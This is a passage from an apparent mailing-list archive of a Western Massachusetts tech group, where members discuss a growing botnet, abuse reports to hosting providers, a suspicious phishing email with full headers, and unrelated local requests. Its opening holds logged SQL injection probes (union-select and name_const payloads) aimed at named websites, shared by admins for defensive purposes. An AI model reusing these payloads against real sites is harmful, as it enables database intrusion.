term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) > 94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1 > 94.130.76.249 13:39:01 fitzgerald-realestate.com /z > term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 > 94.130.76.249 13:39:03 fitzgerald-realestate.com /z > term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x > 94.130.76.249 13:39:04 fitzgerald-realestate.com /z > term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x > 94.130.76.249 13:39:06 fitzgerald-realestate.com /z > term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 > 94.130.76.249 13:39:07 fitzgerald-realestate.com /z > term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x > 94.130.76.249 13:39:09 fitzgerald-realestate.com /z > term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x > > 37.247.110.108 08:14:38 Greenfield-MA.gov /z > term=Licensing%20AND%201=1 37.247.110.108 08:14:42 Greenfield-MA.gov > /z > term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 > 37.247.110.108 08:14:44 Greenfield-MA.gov /z > term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x > 37.247.110.108 08:14:46 Greenfield-MA.gov /z > term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x > > 192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing > 192.3.204.226 14:58:56 Greenfield-MA.gov /z > term=Licensing2121121121212/1 192.3.204.226 14:58:57 Greenfield-MA.gov > /z term=Licensing%20AND%201=1 192.3.204.226 14:58:59 Greenfield-MA.gov > /z > term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 > 192.3.204.226 14:59:00 Greenfield-MA.gov /z > term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x > --- > Mik Muller, president > Montague WebWorks > 239-R Main Street, Greenfield, MA > 413-320-5336 > http://MontagueWebWorks.com > Powered by ROCKETFUSION -- Paul Bissex, software engineer http://paulbissex.com/ Greenfield MA 01301 USA 413-230-9451 -------------- next part -------------- An HTML attachment was scrubbed... URL: From jm-hiddentech at vj8.net Tue Feb 16 00:34:26 2021 From: jm-hiddentech at vj8.net (James Triplett) Date: Mon, 15 Feb 2021 19:34:26 -0500 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <010001778daf3a26-b30265d1-542d-4aa2-a707-fdcc4cea9962-000000@email.amazonses.com> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> <010001778daf3a26-b30265d1-542d-4aa2-a707-fdcc4cea9962-000000@email.amazonses.com> Message-ID: <20210216003426.tuuivlehmasqi5f4@bermuda.datamat.net> On (10/02/21 20:43), Matthew Crocker wrote: > Date: Wed, 10 Feb 2021 20:43:27 +0000 > From: Matthew Crocker > To: James Triplett , > hidden-discuss at lists.hidden-tech.net > Subject: Re: [Hidden-tech] Fiber Internet in Greenfield? > > > James, > > What is the address you are looking for? MBI can do lateral builds, not sure if 20-30 mbps is big enough to justify the cost though. Have you looked at GCET? > Thanks, people, GCET looks like the place to look; they seem to have lots of bandwidth ;-) james From sam at itabix.com Tue Feb 16 16:59:32 2021 From: sam at itabix.com (Sam McClellan) Date: Tue, 16 Feb 2021 11:59:32 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com> References: <26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com> <05b9d47c-f3bd-ef34-d8ea-455281f607a3@gmail.com> Message-ID: Hi Mik, Thanks for the heads up. We haven't seen any increase in IP based attacks lately, last time we saw an increase was about four months ago. So maybe you're just the lucky winner this time. Best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: kchjbhhfebipkoci.png Type: image/png Size: 15646 bytes Desc: not available URL: From lkuttner at nesea.org Wed Feb 17 15:23:46 2021 From: lkuttner at nesea.org (Larry Kuttner) Date: Wed, 17 Feb 2021 10:23:46 -0500 Subject: [Hidden-tech] Growing Botnet? Message-ID: Mik-- We have been seeing some of those for a while. I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their customer, which seems ridiculous. Their response was: *Thank you for your abuse report.We can only process your report by first forwarding them to our customer.We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer.* -- *Larry Kuttner* Information Technology Manager Northeast Sustainable Energy Association (NESEA) 20 Federal Street, Greenfield, MA 01301 413.774.6051 <(413)%20774-6051> ext. 12 *?* lkuttner at nesea.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From jackjrabbit at gmail.com Wed Feb 17 17:07:08 2021 From: jackjrabbit at gmail.com (Jack L.) Date: Wed, 17 Feb 2021 12:07:08 -0500 Subject: [Hidden-tech] Fwd: Growing Botnet? In-Reply-To: References: Message-ID: ---------- Forwarded message --------- From: Jack L. Date: Wed, Feb 17, 2021, 12:06 Subject: Re: [Hidden-tech] Growing Botnet? To: Larry Kuttner that sounds extremely unstandard. spoke to a friend they questioned if that's in line with RIPE policy as an IP space owner. I'd escalate if you actually want a response. On Wed, Feb 17, 2021, 10:55 Larry Kuttner via Hidden-discuss < hidden-discuss at lists.hidden-tech.net> wrote: > Mik-- We have been seeing some of those for a while. I had submitted an > abuse complaint to Hetzner.com and they said that we would need to have our > information first be sent to their customer, which seems ridiculous. > Their response was: > > > *Thank you for your abuse report.We can only process your report by first > forwarding them to our customer.We cannot skip over this step. Your > complaint cannot continue forward unless it is first sent to the customer.* > > -- > *Larry Kuttner* > Information Technology Manager > Northeast Sustainable Energy Association (NESEA) > 20 Federal Street, Greenfield, MA 01301 > 413.774.6051 <(413)%20774-6051> ext. 12 *?* lkuttner at nesea.org > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -------------- next part -------------- An HTML attachment was scrubbed... URL: From tech at montaguewebworks.com Thu Feb 18 20:50:09 2021 From: tech at montaguewebworks.com (Michael Muller) Date: Thu, 18 Feb 2021 15:50:09 -0500 Subject: [Hidden-tech] [Michael Muller] Re: Building a Gaming computer In-Reply-To: References: Message-ID: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com> Did everyone get this email back on Feb 5 from "Stephen " It had an XLS file attached and the emailer asked me to sign it and email it back. Yeah, right.. Looks like someone's account has been hacked. Full headers, below. Original email below that. Mik Return-Path: Received: from bulk.webworksserver.com (ns2.webworksserver.com [216.144.202.140]) by mail.montaguewebworks.com with SMTP; Fri, 5 Feb 2021 12:21:40 -0500 Received: from eastern.birch.relay.mailchannels.net (eastern.birch.relay.mailchannels.net [23.83.209.55]) by bulk.webworksserver.com with SMTP; Fri, 5 Feb 2021 12:21:11 -0500 X-Sender-Id: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com Received: from relay.mailchannels.net (localhost [127.0.0.1]) by relay.mailchannels.net (Postfix) with ESMTP id 37E6E3626DE for ; Fri, 5 Feb 2021 17:21:10 +0000 (UTC) Received: from single-4760.banahosting.com (100-96-17-21.trex.outbound.svc.cluster.local [100.96.17.21]) (Authenticated sender: spamcontrol26) by relay.mailchannels.net (Postfix) with ESMTPA id CBF54361B28 for ; Fri, 5 Feb 2021 17:21:08 +0000 (UTC) X-Sender-Id: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com Received: from single-4760.banahosting.com (single-4760.banahosting.com [216.246.112.130]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384) by 100.96.17.21 (trex/6.0.2); Fri, 05 Feb 2021 17:21:10 +0000 X-MC-Relay: Neutral X-MailChannels-SenderId: spamcontrol26|x-authuser|antwon.bechtelar at imperfecciones.inatural24.com X-MailChannels-Auth-Id: spamcontrol26 X-Broad-Glossy: 558c9eac2a044873_1612545670028_996257083 X-MC-Loop-Signature: 1612545670028:2745538572 X-MC-Ingress-Time: 1612545670028 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=imperfecciones.inatural24.com; s=default; h=To:From:sender:Content-Type: list-subscribe:list-help:list-post:list-archive:list-unsubscribe:list-id: Subject:Message-ID:Date:In-Reply-To:References:MIME-Version:Reply-To:Cc: Content-Transfer-Encoding:Content-ID:Content-Description:Resent-Date: Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Owner; bh=8QbOk5X/DJC/JrDLwywE3Z5EcCTx9NewgTRN4ZM2KPc=; b=qyxDF5/F6K5WYoqMbTd3JAJ+1 +cdbjaUXg8Fv7oNponlrOuLhkkco47bBSRIEUu/het4QS+8Wyz/5DKXFH8hL2gcp9tHfah0xSOncv vtdHjy9dagsdFULI/f9FVZLxrIMqVANHiScOa4Dn0RuoqgxAPIg6IwRmwVBIT4F5Zbv31yu/h03wq hqil21krXCb338gnBDC3VSGJVuj5i1zEkZnWSzuaNi6brhPso35VlYSAaGFMlkwgZQgD/4Af6cBfS QHhvzpqqR4cSfy3qfAzs116ZazTzZyC/BomySaA3NgwBZIPZz65vVLTgzVGtD3tf+6sR0QOKzxwO4 Yiav0h2XA==; Received: from [103.142.121.6] (port=58726 helo=imperfecciones.inatural24.com) by single-4760.banahosting.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (Exim 4.93) (envelope-from ) id 1l84mw-0001Aa-7P for tech at montaguewebworks.com; Fri, 05 Feb 2021 12:21:03 -0500 delivered-to: rroth at tnrglobal.com delivered-to: rzroth at gmail.com arc-seal: i=1; a=rsa-sha256; t=1611268628; cv=none; d=google.com; s=arc-20160816; b=ScWOCfOmy7vRf4HLZOOV4HikbF7xmkvjtH4G4No/rtuf9M0M79j1TWD8Z2FcFT3/oI vWdSgV1J/wrIKkAK0jyLc1AmP7e66Ipf8hNZYoCfdqg+vZ1zdUXuf3X5tOHvVO05PyTm 7Etme5pS48wOeO4M2DTwmONMPr5IMkxMevrDi0NgampP0wKX71M7U/Uw/F1uUVxrbR7Y 8cxx8ZxVYWJXEjz+Cxe6KPGlWq6eR6gE1yjGjc2lSR/vnG1yQy2fEcidUrgwA+TItvxB EOXQk8SV0QHQEsTI/bhJr9BzpzvVi/4/ONSL3z4TjooYu704+oVRS2mlUgtL5gZEhhsT m11Q== arc-message-signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=sender:errors-to:cc:reply-to:from:list-subscribe:list-help :list-post:list-archive:list-unsubscribe:list-id:precedence:subject :to:message-id:date:in-reply-to:references:mime-version :dkim-signature:delivered-to; bh=rwZDk7lq3lrkvu+1S7/aTNv2X7BaX5FbTLyVpYlhSgk=; b=L5g4SopSwIyv/92of76t+91FnKJntKO+mLOExHeZqXtVPkVAS+5R5k5U/Ed2sT1MwF nmcwi5jgRFsNNCNRF0Xw2NkzG2U9tX1NemHAfSNEPP1MX5f0U5hUBLYEYwvnQmH1PpTl Li36w7izyF9fe/M6lPXl2AKG3ZgA+mffoBTbFqvnSjQ2YHygHh0NA+o1PwstTf2GNI0G mhCtB1796QJpeKZf1SPD6PQoLcxNE/YAz9BtVWzws56KQc6AIP6jE61ddsZ9JlbfWGap n51OHE2zbiwEjdAszl8EwNOlqU/tQWCsY9hABNxAaIlNorgBh7ZE9KGwS1cYNAwvoFZV Ze+g== arc-authentication-results: i=1; mx.google.com; dkim=neutral (body hash did not verify) header.i=@justpeachy.io header.s=google header.b=VNjaU3CS; spf=pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) smtp.mailfrom=hidden-discuss-bounces at lists.hidden-tech.net; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=hidden-tech.net received-spf: pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) client-ip=3.17.96.37; authentication-results: mx.google.com; dkim=neutral (body hash did not verify) header.i=@justpeachy.io header.s=google header.b=VNjaU3CS; spf=pass (google.com: domain of hidden-discuss-bounces at lists.hidden-tech.net designates 3.17.96.37 as permitted sender) smtp.mailfrom=hidden-discuss-bounces at lists.hidden-tech.net; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=hidden-tech.net authentication-results: dmoz.awboc.com; dkim=fail (verification failed) header.i=@justpeachy.io; x-dkim-adsp=none delivered-to: hidden-discuss at dmoz.awboc.com MIME-Version: 1.0 References: In-Reply-To: Date: Fri, 05 Feb 2021 17:20:59 -0600 Message-ID: Subject: [Michael Muller] Re: [Hidden-tech] Building a Gaming computer precedence: list list-id: list-unsubscribe: , list-archive: list-post: list-help: list-subscribe: , Content-Type: multipart/mixed; boundary="===============4690247477778557202==" sender: Hidden-discuss X-Priority: 3 (Normal) From: Stephen To: "Michael Muller" X-YourOrg-MailScanner-Information: Please contact the ISP for more information X-YourOrg-MailScanner-ID: 1l84mw-0001Aa-7P X-YourOrg-MailScanner: Found to be clean X-YourOrg-MailScanner-SpamCheck: X-YourOrg-MailScanner-From: antwon.bechtelar at imperfecciones.inatural24.com X-Spam-Status: No X-AuthUser: antwon.bechtelar at imperfecciones.inatural24.com X-Exim-Id: D74A3708C7EA2C3662E6C0CBD46EC1AA17A63A8F X-Declude-Sender: antwon.bechtelar at imperfecciones.inatural24.com [216.144.202.140] X-Declude-Spoolname: 93590942.eml X-Declude-RefID: X-Declude-Note: Scanned by Declude 4.12.11 X-Declude-Scan: Incoming Score [0] at 12:21:50 on 05 Feb 2021 X-Declude-Tests: Whitelisted X-Country-Chain: UNITED STATES->destination X-Declude-Code: 2000010f X-HELO: bulk.webworksserver.com X-Identity: 216.144.202.140 | ns2.webworksserver.com | imperfecciones.inatural24.com X-SmarterMail-Spam: Declude: 0 X-SmarterMail-TotalSpamWeight: 0 (Authenticated) --- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION On 2/5/2021 6:20 PM, Stephen wrote: > > Good aftenoon, > Please examine and sign the attached documentation. > > > > > >> Seconding Mik's recommendation! About Face is great. >> >> On Thu, Jan 21, 2021 at 2:03 PM Michael Muller via Hidden-discuss >> > > wrote: >> >> I always like working with About Face Computers in Turners. >> >> * https://about-facecomputers.com >> >> Mik >> >> --- >> Mik Muller, president >> Montague WebWorks >> 239-R Main Street, Greenfield, MA >> 413-320-5336 >> http://MontagueWebWorks.com >> Powered by ROCKETFUSION >> >> On 1/19/2021 9:54 PM, David Ruderman via Hidden-discuss wrote: >>> Hey friends, >>> >>> I do any of you have a recommendation for someone or a local business who can help my 19 year old stepson finish building his high end gaming computer ? He bought what he says are all the components but he is stuck with nothing powering up. He realizes this wouldn?t be free, of course. >>> >>> Thanks, >>> >>> -dave >>> _______________________________________________ >>> Hidden-discuss mailing list - home page:http://www.hidden-tech.net >>> Hidden-discuss at lists.hidden-tech.net >>> >>> You are receiving this because you are on the Hidden-Tech Discussion list. >>> If you would like to change your list preferences, Go to the Members >>> page on the Hidden Tech Web site. >>> http://www.hidden-tech.net/members >> _______________________________________________ >> Hidden-discuss mailing list - home page: >> http://www.hidden-tech.net >> Hidden-discuss at lists.hidden-tech.net >> >> >> You are receiving this because you are on the Hidden-Tech >> Discussion list. >> If you would like to change your list preferences, Go to the Members >> page on the Hidden Tech Web site. >> http://www.hidden-tech.net/members >> >> -------------- next part -------------- An HTML attachment was scrubbed... URL: From tech at montaguewebworks.com Thu Feb 18 20:58:25 2021 From: tech at montaguewebworks.com (Michael Muller) Date: Thu, 18 Feb 2021 15:58:25 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: References: Message-ID: <205e1001-8f42-9cae-5691-ccb773348252@montaguewebworks.com> What the? Bizarre. I've been forwarding the list of attack page requests to the NOC for the IPs I've been finding. The list has been growing every day. And yes, Hetzner is in my list. This is what I got back from them, along with a ticket number: Hi there We received your email. Thanks for writing to us. You have probably realized by now that this is an automated message. We need some time to process each email that we receive, but we will write back to you personally as soon as we can. Thank you for your understanding! Kind regards Your Hetzner Online Team Hetzner Online GmbH Industriestr. 25 91710 Gunzenhausen / Germany Tel.: +49 9831 505-0 Fax: +49 9831 505-3 www.hetzner.com I also sent an abuse email to another host and got this back! --- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION On 2/17/2021 10:23 AM, Larry Kuttner via Hidden-discuss wrote: > Mik-- We have been seeing some of those for a while.? I had submitted > an abuse complaint to Hetzner.com and they said that we would need to > have our information first be sent to their?customer, which seems > ridiculous. > Their response?was: > /Thank you for your abuse report. > We can only process your report by first forwarding them to our customer. > We cannot skip over this step. Your complaint cannot continue forward > unless it is first sent to the customer./ > > -- > *Larry Kuttner* > Information Technology Manager > Northeast Sustainable Energy Association (NESEA) > 20 Federal Street, Greenfield, MA 01301 > 413.774.6051 ?ext. 12 *?*lkuttner at nesea.org > > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: bgpmecaihgfdgmik.png Type: image/png Size: 33992 bytes Desc: not available URL: From eddygold at aol.com Fri Feb 19 14:07:11 2021 From: eddygold at aol.com (eddygold at aol.com) Date: Fri, 19 Feb 2021 14:07:11 +0000 (UTC) Subject: [Hidden-tech] Book recommendation References: <1328862444.202743.1613743631915.ref@mail.yahoo.com> Message-ID: <1328862444.202743.1613743631915@mail.yahoo.com> The Age of Surveillance Capitalism, Shoshana Zuboff. Eddy in Amherst -------------- next part -------------- An HTML attachment was scrubbed... URL: From rich at tnrglobal.com Fri Feb 19 15:11:54 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Fri, 19 Feb 2021 10:11:54 -0500 Subject: [Hidden-tech] [Michael Muller] Re: Building a Gaming computer In-Reply-To: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com> References: <0d5520c4-a688-2fa9-646b-b5c78e1e6655@montaguewebworks.com> Message-ID: Anyone who got that message please reply to me directly - I would sure like to get to the source of this. It's identified by the From and XML contents - not by the subject. The only reference back to me is in the headers and yet I never saw the message with XML attachments. I keep folders of bogus messages and all messages in an archive or (that recent) junk or spam folders. AND if you goggle that email antwon.bechtelar -- it shows up in a PHP git class that generates fake names for testing. I removed the headers Mik posted - you can see the full email down the list. Lets keep more this off the list and I'll report how many saw it and if anything comes up. As for now, Mik and Stephen Michel saw it - with different bodies. This leads me to believe someone has just taken and hand hacked some of the HT archive -- date 2/5 on both. And thanks Mik for the full headers - that is what is needed to make any sense of this. Stay well - Rich On 2/18/2021 3:50 PM, Michael Muller via Hidden-discuss wrote: > > Did everyone get this email back on Feb 5 from "Stephen > " > > It had an XLS file attached and the emailer asked me to sign it and > email it back. Yeah, right.. Looks like someone's account has been hacked. > > Full headers, below. Original email below that. > > Mik > > -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From jwaggoner at micablue.com Fri Feb 19 14:17:25 2021 From: jwaggoner at micablue.com (Julie Waggoner) Date: Fri, 19 Feb 2021 09:17:25 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <205e1001-8f42-9cae-5691-ccb773348252@montaguewebworks.com> Message-ID: ....?dSent from my Verizon, Samsung Galaxy smartphone -------- Original message --------From: Michael Muller via Hidden-discuss Date: 2/19/21 8:37 AM (GMT-05:00) To: Larry Kuttner , hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] Growing Botnet? What the? Bizarre. I've been forwarding the list of attack page requests to the NOC for the IPs I've been finding. The list has been growing every day. And yes, Hetzner is in my list. This is what I got back from them, along with a ticket number: Hi there We received your email. Thanks for writing to us. You have probably realized by now that this is an automated message. We need some time to process each email that we receive, but we will write back to you personally as soon as we can. Thank you for your understanding! Kind regards Your Hetzner Online Team Hetzner Online GmbH Industriestr. 25 91710 Gunzenhausen / Germany Tel.: +49 9831 505-0 Fax: +49 9831 505-3 www.hetzner.com I also sent an abuse email to another host and got this back! --- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION On 2/17/2021 10:23 AM, Larry Kuttner via Hidden-discuss wrote: Mik-- We have been seeing some of those for a while.? I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their?customer, which seems ridiculous.?? Their response?was: Thank you for your abuse report. We can only process your report by first forwarding them to our customer. We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer. -- Larry Kuttner Information Technology Manager Northeast Sustainable Energy Association (NESEA) 20 Federal Street, Greenfield, MA 01301 413.774.6051?ext.?12???lkuttner at nesea.org _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From jwaggoner at micablue.com Fri Feb 19 15:42:31 2021 From: jwaggoner at micablue.com (Julie Waggoner) Date: Fri, 19 Feb 2021 10:42:31 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <20210219151313.E54A17DD65@dmoz.awboc.com> Message-ID: That was an error...not sure why this email was sent. Apologies.?Sent from my Verizon, Samsung Galaxy smartphone -------- Original message --------From: Julie Waggoner via Hidden-discuss Date: 2/19/21 10:13 AM (GMT-05:00) To: Michael Muller , Larry Kuttner , hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] Growing Botnet? ....?dSent from my Verizon, Samsung Galaxy smartphone-------- Original message --------From: Michael Muller via Hidden-discuss Date: 2/19/21 8:37 AM (GMT-05:00) To: Larry Kuttner , hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] Growing Botnet? What the? Bizarre. I've been forwarding the list of attack page requests to the NOC for the IPs I've been finding. The list has been growing every day. And yes, Hetzner is in my list. This is what I got back from them, along with a ticket number: Hi there We received your email. Thanks for writing to us. You have probably realized by now that this is an automated message. We need some time to process each email that we receive, but we will write back to you personally as soon as we can. Thank you for your understanding! Kind regards Your Hetzner Online Team Hetzner Online GmbH Industriestr. 25 91710 Gunzenhausen / Germany Tel.: +49 9831 505-0 Fax: +49 9831 505-3 www.hetzner.com I also sent an abuse email to another host and got this back! --- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION On 2/17/2021 10:23 AM, Larry Kuttner via Hidden-discuss wrote: Mik-- We have been seeing some of those for a while.? I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their?customer, which seems ridiculous.?? Their response?was: Thank you for your abuse report. We can only process your report by first forwarding them to our customer. We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer. -- Larry Kuttner Information Technology Manager Northeast Sustainable Energy Association (NESEA) 20 Federal Street, Greenfield, MA 01301 413.774.6051?ext.?12???lkuttner at nesea.org _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From debchandler411 at gmail.com Tue Feb 23 01:50:42 2021 From: debchandler411 at gmail.com (Deborah Chandler) Date: Mon, 22 Feb 2021 20:50:42 -0500 Subject: [Hidden-tech] Fwd: * * * Experience with GoPro 9? * * * In-Reply-To: References: Message-ID: Hi folks, Just thought I'd check in again and see if anyone has first-hand experience with the GoPro 9. Thanks, Deb ---------- Forwarded message --------- From: Deborah Chandler Date: Sun, Jan 31, 2021 at 9:14 PM Subject: * * * Experience with GoPro 9? * * * To: Hidden-Tech Tech Hi folks, A friend is contemplating getting a GoPro 9 for his mobile videography work. Are folks here willing to talk with him about your experience and/or opinion about it? Or are there other video cameras you recommend? He currently has a Sony HandiCam. If you could provide your contact info, I will pass it along to him. He's looking to buy this very soon. Thanks! Deb -------------- next part -------------- An HTML attachment was scrubbed... URL: From editorial at gonomad.com Tue Feb 23 14:43:20 2021 From: editorial at gonomad.com (Max Hartshorne) Date: Tue, 23 Feb 2021 09:43:20 -0500 (EST) Subject: [Hidden-tech] RSS help Message-ID: <1614091400.160423848@email.rackspace.com> I've rarely asked for help in the many decades of my HT association. Boy, I can remember when we used to hold wine parties in my cafe in the early 00s with many of those who still read these missives. Can someone help me edit my website's RSS feed? [ https://www.gonomad.com/feed ]( https://www.gonomad.com/feed ) I send out a daily Mailchimp email using RSS of today's travel story, and it's sending out double images. I have a screenshot of the code that shows the duplicate but I can't find where to edit my own RSS feed in Wordpress. Any help? ----------------------- Max Hartshorne Editor GoNOMAD.com Travel P.O. Box 4 9 Mountain Rd. South Deerfield, MA 01373 413-624-6640 [ www.gonomad.com ]( http://www.gonomad.com ) [ ]( https://www.gonomad.com/3500-writers-guidelines-gonomad-travel ) [ Writer's Guidelines ]( https://www.gonomad.com/3500-writers-guidelines-gonomad-travel ) My One minute. [ video about ]( http://youtu.be/FlH08PisCkg?a ) [ Content Marketing ]( http://youtu.be/FlH08PisCkg?a ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From sam at itabix.com Tue Feb 23 15:04:06 2021 From: sam at itabix.com (Sam McClellan) Date: Tue, 23 Feb 2021 10:04:06 -0500 Subject: [Hidden-tech] RSS help In-Reply-To: <1614091400.160423848@email.rackspace.com> References: <1614091400.160423848@email.rackspace.com> Message-ID: <6f20938d-4253-1103-098d-3fba8bcd8ac9@itabix.com> Hi Max, I've personally never done that, but from what I found you can either edit the feed template or use a plugin like https://wordpress.org/plugins/custom-simple-rss/ https://codex.wordpress.org/Customizing_Feeds Best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * On 2/23/2021 9:43 AM, Max Hartshorne via Hidden-discuss wrote: > > I've rarely asked for help in the many decades of my HT association. > Boy, I can remember when we used to hold wine parties in my cafe in > the early 00s with many of those who still read these missives. > > Can someone help me edit my website's RSS feed? > > > https://www.gonomad.com/feed > > I send out a daily Mailchimp email using RSS of today's travel story, > and it's sending out double images. I have a screenshot of the code > that shows the duplicate but I can't find where to edit my own RSS > feed in Wordpress. Any help? > > ----------------------- > > Max Hartshorne > > Editor > > GoNOMAD.com Travel > > P.O. Box 4 > > 9 Mountain Rd. > > South Deerfield, MA 01373 > > 413-624-6640 > > www.gonomad.com > > > > Writer's Guidelines > > > My One minute. video about > > Content Marketing > > > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: jkemniakdfapbfoe.png Type: image/png Size: 15646 bytes Desc: not available URL: From debchandler411 at gmail.com Tue Feb 23 21:22:46 2021 From: debchandler411 at gmail.com (Deborah Chandler) Date: Tue, 23 Feb 2021 16:22:46 -0500 Subject: [Hidden-tech] * * * Seeking garage/workshop space ASAP * * * Message-ID: Hi folks, A colleague is seeking a space to do woodwork/machining/etc. in the greater Palmer, Belchertown, Granby, Ware, MA vicinity. If you know of something, please let me know. Thanks, Deb -------------- next part -------------- An HTML attachment was scrubbed... URL: From martha at ftllabscorp.com Wed Feb 24 14:05:24 2021 From: martha at ftllabscorp.com (Martha Marteney) Date: Wed, 24 Feb 2021 09:05:24 -0500 Subject: [Hidden-tech] JOB: Engineering Software Developer - Second Position Message-ID: *ABOUT THE POSITION:* FTL 